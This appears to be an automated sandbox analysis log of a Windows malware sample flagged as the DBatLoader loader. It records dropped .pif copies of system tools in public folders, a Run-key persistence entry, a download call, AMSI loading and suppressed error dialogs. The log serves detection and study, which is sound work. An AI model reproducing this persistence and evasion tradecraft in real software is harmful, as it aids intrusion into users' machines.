                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
                  Source: AWkpqJMxci.exeStatic file information: File size 1339392 > 1048576
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: AWkpqJMxci.exe, AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782458415.000000000238F000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5CA000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000003.00000003.1762893892.0000000000AA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000005.00000000.1769159470.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000009.00000000.1774119719.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1777848027.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000D.00000000.1873419118.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000E.00000002.1875239143.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1876616016.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.3.dr
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000004.00000003.1766895449.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000B.00000002.1870542553.0000000000D11000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.4.dr
                  Source: Binary string: easinvoker.pdbH source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782458415.000000000238F000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5CA000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E668000.00000004.00000020.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E63F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000A.00000000.1777848027.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000D.00000000.1873419118.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000E.00000002.1875239143.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1876616016.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.3.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000004.00000003.1766895449.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000B.00000002.1870542553.0000000000D11000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.4.dr

                  Data Obfuscation

                  barindex
                  Yara detected DBatLoader
                  Source: Yara matchFile source: 0.2.AWkpqJMxci.exe.2880000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.AWkpqJMxci.exe.238f278.2.unpack, type: UNPACKEDPE
                  Source: alpha.pif.3.drStatic PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0289894C
                  Source: alpha.pif.3.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028AD2FC push 028AD367h; ret 0_2_028AD35F
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028863AE push 0288640Bh; ret 0_2_02886403
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028863B0 push 0288640Bh; ret 0_2_02886403
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288332C push eax; ret 0_2_02883368
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288C349 push 8B0288C1h; ret 0_2_0288C34E
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028AC378 push 028AC56Eh; ret 0_2_028AC566
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028AD0AC push 028AD125h; ret 0_2_028AD11D
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289306B push 028930B9h; ret 0_2_028930B1
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289306C push 028930B9h; ret 0_2_028930B1
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028AD1F8 push 028AD288h; ret 0_2_028AD280
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289F108 push ecx; mov dword ptr [esp], edx0_2_0289F10D
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028AD144 push 028AD1ECh; ret 0_2_028AD1E4
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02886782 push 028867C6h; ret 0_2_028867BE
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02886784 push 028867C6h; ret 0_2_028867BE
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288D5A0 push 0288D5CCh; ret 0_2_0288D5C4
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288C56C push ecx; mov dword ptr [esp], edx0_2_0288C571
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028AC570 push 028AC56Eh; ret 0_2_028AC566
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02898AD8 push 02898B10h; ret 0_2_02898B08
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289AAE0 push 0289AB18h; ret 0_2_0289AB10
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_028F4A50 push eax; ret 0_2_028F4B20
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288CBEC push 0288CD72h; ret 0_2_0288CD6A
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289886C push 028988AEh; ret 0_2_028988A6
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289790C push 02897989h; ret 0_2_02897981
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02896948 push 028969F3h; ret 0_2_028969EB
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02896946 push 028969F3h; ret 0_2_028969EB
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288C95F push 0288CD72h; ret 0_2_0288CD6A
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02895E7C push ecx; mov dword ptr [esp], edx0_2_02895E7E
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02892F60 push 02892FD6h; ret 0_2_02892FCE
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B171ED push ecx; ret 5_2_00B17200
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B1722B push ecx; ret 5_2_00B1723E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046B7186 push ecx; ret 8_2_046B7199

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Bzaszylr.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04666EEB ShellExecuteW,URLDownloadToFileW,8_2_04666EEB
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Bzaszylr.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

                  Boot Survival

                  barindex
                  Drops PE files to the user root directory
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0467AADB
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BzaszylrJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BzaszylrJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0289AB1C
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
